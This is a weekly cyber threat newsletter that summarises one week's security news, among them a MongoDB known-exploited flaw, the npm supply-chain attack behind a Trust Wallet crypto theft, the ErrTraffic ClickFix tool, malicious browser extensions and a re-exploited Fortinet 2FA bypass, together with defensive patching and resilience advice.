Cyber Threat Weekly – #110

The week of December 29th through January 4^th, around 142 cyber news articles were reviewed. A very light week in cyber threat trends and adversarial behavior news.  Been thinkin about the principle of resiliency.

There is a lot that can go into resilience like understanding your critical business processes and having a plan should systems or processes fail.  Business continuity, if you lose 70% of your systems to ransomware, how will you continue to operate?  Disaster recovery, immutable backups with restoration tested and timed.  A response plan for natural disasters and man-made disasters like ransomware or just mistakes leading to downtime or data loss.

Let’s start with apparent deception operations might have nabbed a criminal.  NPM supply chain attack last month leads to crypto theft.  New ClickFix automated tool.  A Chinese threat actor abusing browser extensions. 

A five-year-old Fortinet FortiOS bug is being abused again. 

Broken Record Alert: Don’t get pwned by N-day vulnerabilities!!!

Known exploited software flaws are one of the top 4 initial access vectors and have increased sharply in recent months.  We continue to share n-day vulnerabilities being actively exploited.  Priority #1, start with the CISA / VulnCheck known exploited vulnerability (KEV) catalogs.  If it’s in the catalog, it should be patched.

A close #2 priority is flaws with weaponized proof of concept (PoC) code available.  Exploit chances are higher with weaponized PoC code available.  If you do nothing else with patching, have an emergency 24-to-48-hour patching process for actively exploited and weaponized PoC code available vulnerabilities.

VPN gateways from all vendors are under constant attack.

You should consider what is exposed to the Internet.  Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices and services exposed to the Internet.

CISA Known Exploited Vulnerabilities – December 29^th to January 4^th:

CVE-2025-14847 – MongoDB and MongoDB Server Improper Handling of Length Parameter Inconsistency Vulnerability:
This bug may allow a read of uninitialized heap memory by an unauthenticated client.

Deception Operations?  Criminals claim Resecurity Hacked

Shiny Lapsus$ Hunters threat actors claim to have fully compromised Resecurity in retaliation.  Resecurity claims to have launched a honey account within an isolated environment to monitor attackers.  They say several operational security failures were observed and shared with law enforcement.

https://www.bleepingcomputer.com/news/security/hackers-claim-resecurity-hack-firm-says-it-was-a-honeypot/

https://www.resecurity.com/blog/article/synthetic-data-a-new-frontier-for-cyber-deception-and-honeypots

API Key Stolen via Sha1-Hulud Attack Leads to Crypto Theft

Trust Wallet believes their GitHub secrets were exposed during the Sha1-Hulud supply chain attack against the npm registry.  This provided access to their browser extension source code and Chrome Web Store API key.  The attacker registered the metrics-trustwallet.com domain and a sub-domain.  Roughly $8.5 million in crypto was stolen.  While not easy, when attacks happen that can compromise your systems, verifying you are not affected should be a priority.

https://www.bleepingcomputer.com/news/security/trust-wallet-links-85-million-crypto-theft-to-shai-hulud-npm-attack/

https://trustwallet.com/blog/announcements/trust-wallet-browser-extension-v268-incident-community-update

ClickFix Automated Tool Called ErrTraffic

This tool takes advantage of either attacker controlled or legit but compromised websites.  The site behavior remains the same for all but targeted victims, making it stealthy.  A page appears that looks corrupted, has system font errors, or other lures.  It’s multi-OS capable including Android, macOS, Windows, and Linux.

https://www.bleepingcomputer.com/news/security/new-errtraffic-service-enables-clickfix-attacks-via-fake-browser-glitches/

https://www.infostealers.com/article/the-industrialization-of-clickfix-inside-errtraffic/

Browser Extensions Abused by Chinese Threat Actors

Tracked as DarkSpectre, the latest campaign, Zoom Stealer, which collects online meeting data like URLs, IDs, etc.  Data is exfiltrated via WebSocket and streamed in real time.  One of three active campaigns, this threat actor plays the long game. 

https://www.bleepingcomputer.com/news/security/zoom-stealer-browser-extensions-harvest-corporate-meeting-intelligence/

www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers

Fortinet FortiOS Bug CVE-2020-12812 Once Again Exploited

The company is warning that attackers are abusing this bug again.  It allows for 2FA bypass, just a password needed.  There is a mitigation available.  It’s become obvious, having a VPN gateway is no longer a good option.  Looking at a zero-trust network access solution should be a high priority.

https://www.securityweek.com/fortinet-warns-of-new-attacks-exploiting-old-vulnerability/

https://www.fortinet.com/blog/psirt-blogs/product-security-advisory-and-analysis-observed-abuse-of-fg-ir-19-283